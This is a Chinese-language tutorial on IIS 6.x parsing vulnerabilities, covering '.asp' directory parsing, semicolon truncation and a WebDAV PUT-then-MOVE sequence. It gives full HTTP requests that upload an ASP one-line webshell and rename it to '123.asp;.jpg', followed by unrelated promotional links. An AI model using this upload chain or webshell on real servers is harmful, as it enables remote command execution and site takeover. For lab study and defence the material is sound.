IIS解析漏洞~IIS6.X漏洞分析

IIS解析漏洞~IIS6.X漏洞分析

类型代码量作用一句话木马代码量极少配合webshell管理工具使用小马代码量比小马多大马代码量最多功能比较完善(执行命令,文件操作等)图片马里面传有一句话木马

文件解析漏洞是由于中间件错误的将特殊格式的文件解析成可执行网页文件(脚本),配合文件上传漏洞进行GetShell的漏洞!

一:IIS解析漏洞

1.1:IIS6.X

环境:windows server 2003

方式一:目录解析

在网站下建立文件夹的名字为 .asp/1.jpg 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

方式二:畸形文件解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer

# 我们将大马整到虚拟机中,然后在给它命名为1.asp;.jpg

方式三:PUT上传漏洞( 123.asp;.jpg 解析成asp )

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传

第一步:OPTIONS探测支持的方法

第二步:PUT 一个webshell

PUT /123.txt HTTP/1.1

Host: 192.168.0.180

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i

mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Length: 23

<%eval request("cmd")%>

第三步:重命名该文件

MOVE /123.txt HTTP/1.1

Host: 192.168.0.180

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i

mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Destination: http://192.168.0.180/123.asp;.jpg

Connection: close

Content-Length: 0

第四步:验证

好小子,离成功又近一步!!!

相关推荐

王者荣耀充v5多少钱
365娱乐游戏是什么

王者荣耀充v5多少钱

📅 08-05 👁️ 8789
维尼修斯加冕世界足球先生!为何有人认为他名不副实?
《魔兽世界》宠物赞达拉袭胫者怎么获得 获取方法分享
你们的365还进得去吗

《魔兽世界》宠物赞达拉袭胫者怎么获得 获取方法分享

📅 08-24 👁️ 968